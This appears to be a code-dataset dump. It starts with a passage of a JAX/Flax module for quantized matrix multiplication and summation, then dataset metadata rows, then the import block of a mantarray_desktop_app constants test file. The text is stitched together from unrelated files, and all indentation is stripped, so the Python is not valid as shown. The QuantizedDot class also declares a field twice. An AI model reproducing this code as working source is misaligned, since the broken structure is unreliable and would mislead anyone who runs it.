# float32. This is potentially undesirable since the user might want the raw
# float32 result, but it ultimately stems from a limitation of the HLO 'dot'
# instruction. If that instruction updates to support user-specified output
# types, we could update quantized_dot accordingly to take a dtype argument to
# control the return value type. This applies equally to
# quantized_dynamic_dot_general.
if not (1 <= act.ndim <= 2 and 1 <= w.ndim <= 2 and
act.shape[-1] == w.shape[0]):
raise ValueError('Incompatible shapes for dot: got {} and {}.'.format(
act.shape, w.shape))
dot_dimension_numbers = (((act.ndim - 1,), (0,)), ((), ()))
if quant_type == QuantType.aqt:
# Let 's' be activation scales and 't' be weight scales. We implement
# matmul(RoundAndClip(act*s), RoundAndClip(s^-1 * w * t)) *t^-1. In the
# comments below, we refer to this terminology.
# lax.dot accepts any combination of 1d and 2d arguments for its lhs and rhs
# input. To simplify the AQT implementation, we only accept 2d arguments for
# now.
if w.ndim != 2 or act.ndim != 2:
raise ValueError(
'AQT is currently only implemented for matrix*matrix operations')
num_input_channels = act.shape[1]
num_output_channels = w.shape[1]
# The ValueError raised in the guard at the beginning of this function
# should have already checked that the weight matrix has a number of rows
# equal to the number of channels in the activation.
assert w.shape[0] == num_input_channels
# We carry out all intermediate calculations using the same dtype as the
# inputs. We want to be careful to not take a model configured to be trained
# in bf16 and accidentally train it in fp32 by virtue of the scale dtype
# being fp32.
if act.dtype != w.dtype:
raise TypeError(
f'Activations and weight must have the same dtype, but got {act.dtype} and {w.dtype}'
)
input_dtype = act.dtype
is_act_quantized = False
# In this case, activations will be quantized at some point during training
# (either now or later) and so we need to gather activation statistics by
# calling 'QuantOps.create_input_ops', even if activations are not being
# quantized on this particular training step (see b/174516400).
if act_hparams is not None and act_hparams.prec is not None:
# Calculate 's', the per-column scale factor on activations.
act_op = QuantOps.create_input_ops(
act, hparams=act_hparams, get_bounds_params=get_bounds_params)
is_act_quantized = act_op.should_quantize()
# Quantize activation matrix by computing RoundAndClip(w*s)
# TODO(malmaud): We have to cast quantized activations to an fp format
# instead of int8 since int8 matmul with int32 accumulation is not yet
# supported in XLA (and therefore in Jax). See b/170293520. We keep
# 'act_quantized' in whatever it's original fp format was, typically bf16
# or fp32, to follow what Fakequant does (see the type cast at the end of
# QuantOpts.fake_quant).
act_quantized = act_op.to_quantized(act, dtype=input_dtype)
# Now calculate s^-1. First we extract s, the activation scale factor,
# into a variable called 'act_scale'. We extract it from 'act_op', the
# QuantOps instance that calculated the scale factors for the activation
# matrix.
act_scale = act_op.get_scale_for_aqt(allow_per_channel_scales=True)
# act_scale should either be a scalar, corresponding to per-layer
# quantization, or a matrix with shape (1, num_input_channels),
# corresponding to per-activation-channel scale factors.
if act_scale.ndim != 0:
shape_utils.assert_shapes_equal(act_scale.shape,
(1, num_input_channels))
# 'w' has one row per column of 'act_scale'. To scale each row of 'w' by
# the inverse of the corresponding column in 'act_scale', we first have
# to reshape 'act_scale' from (1, num_input_channels) to
# (num_input_channels, 1) so the scale factors will broadcast
# appropriately across the columns of 'w'.
act_scale = act_scale.reshape(num_input_channels, 1)
# Now we calculate s^-1 * w.
w_scaled_rows = ((1 / act_scale) * w).astype(input_dtype)
# TODO(shivaniagrawal): This section repeats code from the 'else' block.
# The code is repeated twice because quantization can either be disabled
# dynamically by setting the clipping bound to -1 (see comments on
# 'should_quantize'), or statically by setting the 'prec' hyperparameter
# to None. This block deals with the dynamic case (hence necessitating the
# use of the dynamic 'lax.cond') while the 'else' block handles the static
# case. Ultimately, we should unify them.
act_quantized, w_scaled_rows = lax.cond(
is_act_quantized,
lambda _: (act_quantized, w_scaled_rows),
lambda _: (act, w), None)
else:
# In this case, activations are not being quantized; only weights. There
# is no need to absorb activation scales into the rows of the weight
# matrix so 'w_scaled_rows' can just be set to the original weight matrix.
act_quantized = act
w_scaled_rows = w
is_weight_quantized = False
if weight_params is not None and weight_params.prec is not None:
is_weight_quantized = True
# Calculate 'r' from (s^-1) * w
weight_op = QuantOps.create_weights_ops(
w_scaled_rows, weight_params=weight_params)
weight_scale = weight_op.get_scale_for_aqt(allow_per_channel_scales=True)
# Similar to 'act_scale' above, the weight_scale can either be a single
# scalar or be a matrix with shape (1, num_output_channels), corresponding
# to a per-channel scale factor for the weight matrix. We verify it here.
if weight_scale.ndim != 0:
shape_utils.assert_shapes_equal(weight_scale.shape,
(1, num_output_channels))
# Quantize weight matrix by calculating RoundAndClip(s^-1 * w * t)
# TODO(malmaud): See comment on 'act_op.to_quantized' above, which applies
# here as well.
weight_quantized = weight_op.to_quantized(
w_scaled_rows, dtype=input_dtype)
else:
weight_quantized = w_scaled_rows
weight_scale = jnp.array(1.0, dtype=SCALE_DTYPE)
# Use metadata context to annotate op metadata with quantization info
act_prec = None if act_hparams is None else act_hparams.prec
act_has_symm_distribution = act_hparams is not None and (
act_hparams.input_distribution
== QuantOps.ActHParams.InputDistribution.symmetric)
weight_prec = None if weight_params is None else weight_params.prec
# To decide whether to use an integer-domain dot operation, we first check
# if the static quantization parameters are compatible with it by seeing if
# they request that both inputs be quantized 8bits or less. Then check if
# the dynamic parameters are compatible with it. ie, in a training run with
# quantization enabled, are we past the activation start step yet.
# We also do not use int8_to_int32_dot if activation has positive
# distribution and prec=8, since we would not be able to fit uint8 range in
# int8.
# TODO(shivaniagrawal): A proper solution for this would be to have mixed
# dot(uint8, int8) -> int32 in XLA.
weight_fits_in_int8 = is_weight_quantized and (weight_prec is not None and
weight_prec <= 8)
# is_act_quantized might be an instance of a Jax tracer instead of a
# Python boolean since it is generally computed from a dynamic input to a
# JITted Jax function. Thus we use '&' instead of 'and'.
act_prec_fits_int8 = act_prec is not None and (
(act_prec == 8 and act_has_symm_distribution) or (act_prec < 8))
act_fits_in_int8 = is_act_quantized & act_prec_fits_int8
use_int8_to_int32_dot = prefer_int8_to_int32_dot & weight_fits_in_int8 & act_fits_in_int8
metadata_context = contextlib.suppress()
if flags.FLAGS.metadata_enabled:
metadata_context = compute_cost_utils.DotMetadataMonkeyPatch(
lhs_prec=act_prec, rhs_prec=weight_prec, rhs_is_weight=True)
with metadata_context:
# Calculate matmul(...)
out_quantized = dot_general_aqt(
act_quantized,
weight_quantized,
dimension_numbers=dot_dimension_numbers,
dot_precision=dot_precision,
use_int8_to_int32_dot=use_int8_to_int32_dot)
# Scale the columns of the matmul output by computing `matmul(...) * t^-1`
# TODO(malmaud): Make it possible to return an unquantized matmul to support
# disabling quantization during initial phase of training.
#
# We convert the return value back to input_dtype to ensure the output
# tensor of quantized_dot has the same dtype as the input tensors to
# quantized_dot. This explicit cast is necessary since if the inputs are
# bf16, 'weight_scale' will still fp32 and so multipying out_quantized by
# (1/weight_scale) will result in a fp32 tensor. We want to convert that
# back to bf16.
return (out_quantized * (1 / weight_scale)).astype(input_dtype)
elif quant_type in (QuantType.fake_quant, QuantType.fake_quant_with_int):
if quant_type == QuantType.fake_quant_with_int:
fake_dependency = act
# create a dependency on fake input to control constant folding
else:
fake_dependency = None
quantized_type = quant_type.to_jax_type()
w = QuantOps.create_weights_fake_quant(
w,
weight_params=weight_params,
quantized_type=quantized_type,
fake_dependency=fake_dependency)
# TODO(shivaniagrawal): HParams currently allows act_hparams to be NONE.
# Going forward we can change act_hparams to be required field where if
# either `prec` or `bounds` is None will result in No activation
# quantization.
if act_hparams:
act = QuantOps.create_inputs_fake_quant(
act, hparams=act_hparams, get_bounds_params=get_bounds_params)
metadata_context = contextlib.suppress()
# Use metadata context to annotate op metadata with quantization info
act_prec = None if act_hparams is None else act_hparams.prec
weight_prec = None if weight_params is None else weight_params.prec
if flags.FLAGS.metadata_enabled:
metadata_context = compute_cost_utils.DotMetadataMonkeyPatch(
lhs_prec=act_prec, rhs_prec=weight_prec, rhs_is_weight=True)
with metadata_context:
out_quantized = lax.dot_general(
act,
w,
dimension_numbers=dot_dimension_numbers,
precision=dot_precision)
return out_quantized
else:
raise RuntimeError(f'Unsupported quant_type {quant_type}')
class QuantizedDot(nn.Module):
"""Flax module that calculates a quantized 'dot' operation."""
act_hparams: Optional[QuantOps.ActHParams]
quant_type: QuantType
weight_params: QuantOps.WeightParams
act_hparams: Optional[QuantOps.ActHParams]
prefer_int8_to_int32_dot: bool
dot_precision: Optional[PrecisionType] = None
# TODO(malmaud): Remove the 'padding_mask' field from 'GetBounds.Params'
# so that 'get_bounds_params' can be a hyperparameter of this class and
# only the padding mask will be passed as an argumen to '__call__'.
@nn.compact
def __call__(
self, w, act,
get_bounds_params):
return quantized_dot(
w=w,
act=act,
get_bounds_params=get_bounds_params,
quant_type=self.quant_type,
weight_params=self.weight_params,
act_hparams=self.act_hparams,
dot_precision=self.dot_precision,
prefer_int8_to_int32_dot=self.prefer_int8_to_int32_dot)
def quantized_dynamic_dot_general(
*,
lhs_act,
rhs_act,
quant_type,
lhs_act_hparams,
lhs_get_bounds_params,
rhs_act_hparams,
rhs_get_bounds_params,
dot_dimension_numbers,
dot_precision = None):
"""LAX dot general with optionally quantized dynamic inputs.
Wraps LAX's `DotGeneral
<https://github.com/google/jax/blob/f65a327c764406db45e95048dfe09209d8ef6d37/jax/_src/lax/lax.py#L667`_
operator.
Args:
lhs_act: an array representing weights
rhs_act: an array representing activations
quant_type: quantization strategy
lhs_act_hparams: Optional activation quantization hyperparamers for lhs act;
instance of QuantOps.ActHParams. None means no quantization.
lhs_get_bounds_params: Optional get bounds params for lhs act auto
quantization; instance of GetBounds.Params.
rhs_act_hparams: Optional activation quantization hyperparamers for rhs act;
instance of QuantOps.ActHParams. None means no quantization.
rhs_get_bounds_params: Optional get bounds params for rhs act auto
quantization; instance of GetBounds.Params.
dot_dimension_numbers: a tuple of tuples of the form
`((lhs_contracting_dims, rhs_contracting_dims), (lhs_batch_dims,
rhs_batch_dims)).
dot_precision: Optional. Either ``None``, which means the default precision
for the backend, or a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``).
Returns:
An array containing the result.
Raises:
RuntimeError: 'quant_type' had an unrecognized value.
TypeError: Dtypes of lhs_act and rhs_act differed.
"""
# See comment at the beginning of quantized_dot regarding its return type,
# which also applies to this function.
if quant_type == QuantType.aqt:
# Let 's1' be the scale of 'lhs_act' and 's2' be the scale of 'rhs_act'. We
# calculate dot_general(RoundAndClip(s1*lhs_act),
# RoundAndClip(s2*rhs_act))/(s1*s2). Note that unlike in
# quantized_dot_general, the scale factors must be scalar (ie, per-tensor
# quantization) since activations always have static scale factors and so
# there is no way to absorb per-column scale factor from lhs_act into the
# rows of rhs_act.
# See comment on 'input_dtype' in 'quantized_dot'.
if lhs_act.dtype != rhs_act.dtype:
raise TypeError('Both activations must have the same dtypes, but got '
f'{lhs_act.dtype} and {rhs_act.dtype}')
input_dtype = lhs_act.dtype
def get_tensor_and_scale_for_act(
act, hparams,
get_bounds_params
):
# We check whether activations should be quantized based on 'hparams'. If
# so, we quantize it. If not, we return it unchanged. In either case, we
# return a scale factor appropriate for unscaling the result of the
# lax.dot_general.
if hparams is not None and hparams.prec is not None:
quant_op = QuantOps.create_input_ops(
act, hparams=hparams, get_bounds_params=get_bounds_params)
scale = quant_op.get_scale_for_aqt(allow_per_channel_scales=False)
# Since only per-layer scale factors are supported, we assert that the
# scale factors are scalars.
shape_utils.assert_shapes_compatible(scale.shape, ())
# TODO(malmaud): See comment on 'act_op.to_quantized' earlier in this
# file, which applies here as well.
act_quantized = quant_op.to_quantized(act, dtype=input_dtype)
# TODO(shivaniagrawal): See comment in 'dot_general' above on why this
# logic is duplicated here and in the 'else' block below.
return lax.cond(
quant_op.should_quantize(), #
lambda _: (act_quantized, scale), #
lambda _: (act, jnp.array(1.0, dtype=SCALE_DTYPE)), #
None)
else:
# To avoid having a separate code path for every possibility of which of
# the two input tensors are quantized , we implement not quantizing an
# activation tensor by simply setting its corresponding scale factor to
# 1.0.
return act, jnp.array(1.0, dtype=SCALE_DTYPE)
lhs_quantized, lhs_scale = get_tensor_and_scale_for_act(
lhs_act, lhs_act_hparams, lhs_get_bounds_params)
rhs_quantized, rhs_scale = get_tensor_and_scale_for_act(
rhs_act, rhs_act_hparams, rhs_get_bounds_params)
metadata_context = contextlib.suppress()
# Use metadata context to annotate op metadata with quantization info
lhs_prec = None if lhs_act_hparams is None else lhs_act_hparams.prec
rhs_prec = None if rhs_act_hparams is None else rhs_act_hparams.prec
if flags.FLAGS.metadata_enabled:
metadata_context = compute_cost_utils.DotMetadataMonkeyPatch(
lhs_prec=lhs_prec, rhs_prec=rhs_prec, rhs_is_weight=False)
with metadata_context:
out_quantized = lax.dot_general(
lhs_quantized,
rhs_quantized,
dimension_numbers=dot_dimension_numbers,
precision=dot_precision)
# TODO(malmaud): There is an asymmetry here: when we scale the activations
# to quantize them, the scaling happens in QuantOps.to_quantized. But here,
# when we dequantize the matrix multiplication of the activations by
# dividing by the product of the scale factors, we don't use QuantOps. It
# would be cleaner to do both operations at the same level of abstraction.
out = (out_quantized / (lhs_scale * rhs_scale)).astype(input_dtype)
elif quant_type in (QuantType.fake_quant, QuantType.fake_quant_with_int):
# TODO(shivaniagrawal): HParams currently allows act_hparams to be NONE.
# Going forward we can change act_hparams to be required field where if
# either `prec` or `bounds` is None will result in No activation
# quantization.
if lhs_act_hparams:
lhs_act = QuantOps.create_inputs_fake_quant(
lhs_act,
hparams=lhs_act_hparams,
get_bounds_params=lhs_get_bounds_params)
if rhs_act_hparams:
rhs_act = QuantOps.create_inputs_fake_quant(
rhs_act,
hparams=rhs_act_hparams,
get_bounds_params=rhs_get_bounds_params)
metadata_context = contextlib.suppress()
# Use metadata context to annotate op metadata with quantization info
lhs_prec = None if lhs_act_hparams is None else lhs_act_hparams.prec
rhs_prec = None if rhs_act_hparams is None else rhs_act_hparams.prec
if flags.FLAGS.metadata_enabled:
metadata_context = compute_cost_utils.DotMetadataMonkeyPatch(
lhs_prec=lhs_prec, rhs_prec=rhs_prec, rhs_is_weight=False)
with metadata_context:
out = lax.dot_general(
lhs_act,
rhs_act,
dimension_numbers=dot_dimension_numbers,
precision=dot_precision)
else:
raise RuntimeError(f'Unknown quant_type {quant_type}')
return out
@functools.partial(jax.custom_jvp, nondiff_argnums=(1, 2, 3))
def quantized_sum(
x, #
axis,
keepdims,
prec):
"""Sums a tensor while quantizing intermediate accumulations.
This is almost a drop-in replacement for jnp.sum. It only differs in that it
takes in an 'act_hparams' parameter that controls the quantization of
intermediate accumulations during the reduction.
Arguments:
x: Input, a Jax array
axis: Which axes to reduce over (see jnp.sum docs)
keepdims: Whether to keep of drop axes that are reduced (see jnp.sum docs)
prec: Precision to quantize intermediate to. Currently can only an instance
of QuantOps.FloatQuant.FloatPrec, corresponding to an unscaled
floating-point format, or it can be None to indicate no quantization
should be applied.
Returns:
A Jax array with the quantized sum of 'x'.
"""
# Don't quantize. In this case, this function just wraps jnp.sum.
if prec is None:
return jnp.sum(x, axis=axis, keepdims=keepdims)
# We bypass QuantOps.create_input_ops and directly call
# QuantOps.create_symmetric_fp because the former creates an instance of
# GetBounds, which in turn creates state variables to store activation
# statistics. We do not want to compute statistics for each individual
# addition within the sum reduction.
fp_quant = QuantOps.FloatQuant(is_scaled=False, fp_spec=prec)
quant_ops = QuantOps.create_symmetric_fp(fp_quant=fp_quant, bounds=None)
if not isinstance(axis, Iterable):
axis = (axis,)
axis = utils.normalize_axes(axis, x.ndim)
dtype = x.dtype
zero = jnp.zeros((), dtype=dtype)
x_quantized_sum = lax.reduce(
x,
init_values=zero,
computation=lambda a, b: quant_ops.to_quantized(a + b, dtype=dtype),
dimensions=axis)
if keepdims:
x_quantized_sum = jnp.expand_dims(x_quantized_sum, axis)
return x_quantized_sum
@quantized_sum.defjvp
def _quantized_sum_jvp(axis, keepdims, prec, primals, tangents):
(x,), (x_dot,) = primals, tangents
y = quantized_sum(x, axis=axis, keepdims=keepdims, prec=prec)
# We calculate the JVP based on the JVP of the original jnp.sum function. That
# corresponds to using a straight-through-estimator for the quantization
# operators in 'quantized_sum'.
_, y_dot = jax.jvp(lambda x: jnp.sum(x, keepdims=keepdims, axis=axis), (x,),
(x_dot,))
return y, y_dot
@functools.partial(jax.custom_jvp, nondiff_argnums=(2, 3, 4))
def dot_general_aqt(lhs, rhs, dimension_numbers, dot_precision,
use_int8_to_int32_dot):
"""Wrapper around lax.dot_general, but with option to use integer dot.
This function comes equipped with a custom gradient that defines the
gradient of this function to be the same as the equivalent call to
lax.dot_general, ignoring casts to and from integer types so that
quantization-aware-training will work correctly.
See docstring of lax.dot_general.
Args:
lhs: same as in lax.dot_general
rhs: same as in lax.dot_general
dimension_numbers: same as in lax.dot_general
dot_precision: same as in lax.dot_general
use_int8_to_int32_dot: boolean. If true, inputs to lax.dot_general will be
cast to int8 and results accumulated to int32, then converted back to
the original input type.
Returns:
Same as lax.dot_general.
"""
# We define two versions of a dot operation. The first feeds lax.dot_general
# the original inputs, which are typically bfloat16 or float32. The second
# converts the inputs to int8 tensors and accumulates results to an int32
# output.
def dot_general_fp(ops):
lhs_, rhs_ = ops
return lax.dot_general(
lhs_,
rhs_,
dimension_numbers=dimension_numbers,
precision=dot_precision)
def dot_general_int(ops):
lhs_, rhs_ = ops
input_dtype = lhs_.dtype
lhs_int = lhs_.astype(jnp.int8)
rhs_int = rhs_.astype(jnp.int8)
return lax.dot_general(
lhs_int,
rhs_int,
dimension_numbers=dimension_numbers,
precision=dot_precision,
preferred_element_type=jnp.int32).astype(input_dtype)
return lax.cond(use_int8_to_int32_dot, dot_general_int, dot_general_fp,
(lhs, rhs))
@dot_general_aqt.defjvp
def _dot_general_aqt_jvp(dimension_numbers, dot_precision,
use_int8_to_int32_dot, primals, tangents):
"""Custom gradient for dot_general_aqt that ignores integer casts."""
lhs, rhs = primals
lhs_dot, rhs_dot = tangents
y = dot_general_aqt(
lhs,
rhs,
dimension_numbers=dimension_numbers,
dot_precision=dot_precision,
use_int8_to_int32_dot=use_int8_to_int32_dot)
def differentiable_dot_general(lhs_, rhs_):
return lax.dot_general(
lhs_,
rhs_,
dimension_numbers=dimension_numbers,
precision=dot_precision)
_, y_tangent = jax.jvp(differentiable_dot_general, (lhs, rhs),
(lhs_dot, rhs_dot))
return y, y_tangent
| 41.234609
| 105
| 0.706138
|
41225b738d5791377123f0fb2ec7b6aca1ef062d
| 24,806
|
py
|
Python
|
tests/test_constants.py
|
CuriBio/mantarray-desktop-app
|
e00ace0e8c04eca3ae79826c59a878b59e15f6ff
|
[
"MIT"
] | null | null | null |
tests/test_constants.py
|
CuriBio/mantarray-desktop-app
|
e00ace0e8c04eca3ae79826c59a878b59e15f6ff
|
[
"MIT"
] | 253
|
2020-10-16T18:29:15.000Z
|
2022-03-31T21:27:56.000Z
|
tests/test_constants.py
|
CuriBio/mantarray-desktop-app
|
e00ace0e8c04eca3ae79826c59a878b59e15f6ff
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
from enum import IntEnum
import uuid
from mantarray_desktop_app import ADC_CH_TO_24_WELL_INDEX
from mantarray_desktop_app import ADC_CH_TO_IS_REF_SENSOR
from mantarray_desktop_app import ADC_GAIN
from mantarray_desktop_app import ADC_GAIN_DESCRIPTION_TAG
from mantarray_desktop_app import ADC_OFFSET_DESCRIPTION_TAG
from mantarray_desktop_app import BARCODE_CONFIRM_CLEAR_WAIT_SECONDS
from mantarray_desktop_app import BARCODE_GET_SCAN_WAIT_SECONDS
from mantarray_desktop_app import BARCODE_INVALID_UUID
from mantarray_desktop_app import BARCODE_POLL_PERIOD
from mantarray_desktop_app import BARCODE_SCANNER_BOTTOM_WIRE_OUT_ADDRESS
from mantarray_desktop_app import BARCODE_SCANNER_MID_WIRE_OUT_ADDRESS
from mantarray_desktop_app import BARCODE_SCANNER_TOP_WIRE_OUT_ADDRESS
from mantarray_desktop_app import BARCODE_SCANNER_TRIGGER_IN_ADDRESS
from mantarray_desktop_app import BARCODE_UNREADABLE_UUID
from mantarray_desktop_app import BARCODE_VALID_UUID
from mantarray_desktop_app import BUFFERING_STATE
from mantarray_desktop_app import CALIBRATED_STATE
from mantarray_desktop_app import CALIBRATING_STATE
from mantarray_desktop_app import CALIBRATION_NEEDED_STATE
from mantarray_desktop_app import CHANNEL_INDEX_TO_24_WELL_INDEX
from mantarray_desktop_app import CLEAR_BARCODE_TRIG_BIT
from mantarray_desktop_app import CLEARED_BARCODE_VALUE
from mantarray_desktop_app import COMPILED_EXE_BUILD_TIMESTAMP
from mantarray_desktop_app import CONSTRUCT_SENSOR_SAMPLING_PERIOD
from mantarray_desktop_app import CONSTRUCT_SENSORS_PER_REF_SENSOR
from mantarray_desktop_app import CURI_BIO_ACCOUNT_UUID
from mantarray_desktop_app import CURI_BIO_USER_ACCOUNT_ID
from mantarray_desktop_app import CURRENT_BETA1_HDF5_FILE_FORMAT_VERSION
from mantarray_desktop_app import CURRENT_BETA2_HDF5_FILE_FORMAT_VERSION
from mantarray_desktop_app import CURRENT_SOFTWARE_VERSION
from mantarray_desktop_app import DATA_ANALYZER_BETA_1_BUFFER_SIZE
from mantarray_desktop_app import DATA_ANALYZER_BUFFER_SIZE_CENTIMILLISECONDS
from mantarray_desktop_app import DATA_FRAME_PERIOD
from mantarray_desktop_app import DEFAULT_MAGNETOMETER_CONFIG
from mantarray_desktop_app import DEFAULT_SAMPLING_PERIOD
from mantarray_desktop_app import DEFAULT_SERVER_PORT_NUMBER
from mantarray_desktop_app import DEFAULT_USER_CONFIG
from mantarray_desktop_app import FIFO_READ_PRODUCER_DATA_OFFSET
from mantarray_desktop_app import FIFO_READ_PRODUCER_REF_AMPLITUDE
from mantarray_desktop_app import FIFO_READ_PRODUCER_SAWTOOTH_PERIOD
from mantarray_desktop_app import FIFO_READ_PRODUCER_WELL_AMPLITUDE
from mantarray_desktop_app import FIFO_SIMULATOR_DEFAULT_WIRE_OUT_VALUE
from mantarray_desktop_app import FILE_WRITER_BUFFER_SIZE_CENTIMILLISECONDS
from mantarray_desktop_app import FILE_WRITER_PERFOMANCE_LOGGING_NUM_CYCLES
from mantarray_desktop_app import FIRMWARE_VERSION_WIRE_OUT_ADDRESS
from mantarray_desktop_app import INSTRUMENT_COMM_PERFOMANCE_LOGGING_NUM_CYCLES
from mantarray_desktop_app import INSTRUMENT_INITIALIZING_STATE
from mantarray_desktop_app import LIVE_VIEW_ACTIVE_STATE
from mantarray_desktop_app import MAX_MC_REBOOT_DURATION_SECONDS
from mantarray_desktop_app import MAX_POSSIBLE_CONNECTED_BOARDS
from mantarray_desktop_app import MICROSECONDS_PER_CENTIMILLISECOND
from mantarray_desktop_app import MICROSECONDS_PER_MILLISECOND
from mantarray_desktop_app import MIDSCALE_CODE
from mantarray_desktop_app import MILLIVOLTS_PER_VOLT
from mantarray_desktop_app import MIN_NUM_SECONDS_NEEDED_FOR_ANALYSIS
from mantarray_desktop_app import NANOSECONDS_PER_CENTIMILLISECOND
from mantarray_desktop_app import NO_PLATE_DETECTED_BARCODE_VALUE
from mantarray_desktop_app import NO_PLATE_DETECTED_UUID
from mantarray_desktop_app import OUTGOING_DATA_BUFFER_SIZE
from mantarray_desktop_app import RAW_TO_SIGNED_CONVERSION_VALUE
from mantarray_desktop_app import RECORDING_STATE
from mantarray_desktop_app import REF_INDEX_TO_24_WELL_INDEX
from mantarray_desktop_app import REFERENCE_SENSOR_SAMPLING_PERIOD
from mantarray_desktop_app import REFERENCE_VOLTAGE
from mantarray_desktop_app import ROUND_ROBIN_PERIOD
from mantarray_desktop_app import SECONDS_TO_WAIT_WHEN_POLLING_QUEUES
from mantarray_desktop_app import SERIAL_COMM_ADDITIONAL_BYTES_INDEX
from mantarray_desktop_app import SERIAL_COMM_BAUD_RATE
from mantarray_desktop_app import SERIAL_COMM_BOOT_UP_CODE
from mantarray_desktop_app import SERIAL_COMM_CHECKSUM_FAILURE_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_CHECKSUM_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_COMMAND_FAILURE_BYTE
from mantarray_desktop_app import SERIAL_COMM_COMMAND_RESPONSE_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_COMMAND_SUCCESS_BYTE
from mantarray_desktop_app import SERIAL_COMM_DEFAULT_DATA_CHANNEL
from mantarray_desktop_app import SERIAL_COMM_DUMP_EEPROM_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_FATAL_ERROR_CODE
from mantarray_desktop_app import SERIAL_COMM_GET_METADATA_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_HANDSHAKE_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_HANDSHAKE_PERIOD_SECONDS
from mantarray_desktop_app import SERIAL_COMM_HANDSHAKE_TIMEOUT_CODE
from mantarray_desktop_app import SERIAL_COMM_HANDSHAKE_TIMEOUT_SECONDS
from mantarray_desktop_app import SERIAL_COMM_IDLE_READY_CODE
from mantarray_desktop_app import SERIAL_COMM_MAGIC_WORD_BYTES
from mantarray_desktop_app import SERIAL_COMM_MAGIC_WORD_LENGTH_BYTES_CY
from mantarray_desktop_app import SERIAL_COMM_MAGNETOMETER_CONFIG_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_MAGNETOMETER_DATA_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_MAIN_MODULE_ID
from mantarray_desktop_app import SERIAL_COMM_MAX_DATA_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_MAX_PACKET_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_MAX_TIMESTAMP_VALUE
from mantarray_desktop_app import SERIAL_COMM_METADATA_BYTES_LENGTH
from mantarray_desktop_app import SERIAL_COMM_MIN_FULL_PACKET_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_MIN_PACKET_BODY_SIZE_BYTES
from mantarray_desktop_app import SERIAL_COMM_MODULE_ID_INDEX
from mantarray_desktop_app import SERIAL_COMM_MODULE_ID_TO_WELL_IDX
from mantarray_desktop_app import SERIAL_COMM_NUM_ALLOWED_MISSED_HANDSHAKES
from mantarray_desktop_app import SERIAL_COMM_NUM_CHANNELS_PER_SENSOR
from mantarray_desktop_app import SERIAL_COMM_NUM_CHANNELS_PER_SENSOR_CY
from mantarray_desktop_app import SERIAL_COMM_NUM_DATA_CHANNELS
from mantarray_desktop_app import SERIAL_COMM_NUM_SENSORS_PER_WELL
from mantarray_desktop_app import SERIAL_COMM_PACKET_INFO_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_PACKET_TYPE_INDEX
from mantarray_desktop_app import SERIAL_COMM_PLATE_EVENT_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_REBOOT_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_REGISTRATION_TIMEOUT_SECONDS
from mantarray_desktop_app import SERIAL_COMM_RESPONSE_TIMEOUT_SECONDS
from mantarray_desktop_app import SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE
from mantarray_desktop_app import SERIAL_COMM_SET_NICKNAME_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_SET_STIM_PROTOCOL_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_SET_TIME_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_SIMPLE_COMMAND_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_SOFT_ERROR_CODE
from mantarray_desktop_app import SERIAL_COMM_START_DATA_STREAMING_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_START_STIM_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_STATUS_BEACON_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_STATUS_BEACON_PERIOD_SECONDS
from mantarray_desktop_app import SERIAL_COMM_STATUS_BEACON_TIMEOUT_SECONDS
from mantarray_desktop_app import SERIAL_COMM_STATUS_CODE_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_STIM_STATUS_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_STOP_DATA_STREAMING_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_STOP_STIM_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_TIME_INDEX_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_TIME_OFFSET_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_TIME_SYNC_READY_CODE
from mantarray_desktop_app import SERIAL_COMM_TIMESTAMP_BYTES_INDEX
from mantarray_desktop_app import SERIAL_COMM_TIMESTAMP_EPOCH
from mantarray_desktop_app import SERIAL_COMM_TIMESTAMP_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_WELL_IDX_TO_MODULE_ID
from mantarray_desktop_app import SERVER_INITIALIZING_STATE
from mantarray_desktop_app import SERVER_READY_STATE
from mantarray_desktop_app import START_BARCODE_SCAN_TRIG_BIT
from mantarray_desktop_app import START_MANAGED_ACQUISITION_COMMUNICATION
from mantarray_desktop_app import STIM_COMPLETE_SUBPROTOCOL_IDX
from mantarray_desktop_app import STIM_MAX_ABSOLUTE_CURRENT_MICROAMPS
from mantarray_desktop_app import STIM_MAX_ABSOLUTE_VOLTAGE_MILLIVOLTS
from mantarray_desktop_app import STIM_MAX_PULSE_DURATION_MICROSECONDS
from mantarray_desktop_app import STIM_NO_PROTOCOL_ASSIGNED
from mantarray_desktop_app import StimStatuses
from mantarray_desktop_app import STM_VID
from mantarray_desktop_app import STOP_MANAGED_ACQUISITION_COMMUNICATION
from mantarray_desktop_app import SUBPROCESS_POLL_DELAY_SECONDS
from mantarray_desktop_app import SUBPROCESS_SHUTDOWN_TIMEOUT_SECONDS
from mantarray_desktop_app import SYSTEM_STATUS_UUIDS
from mantarray_desktop_app import TIMESTEP_CONVERSION_FACTOR
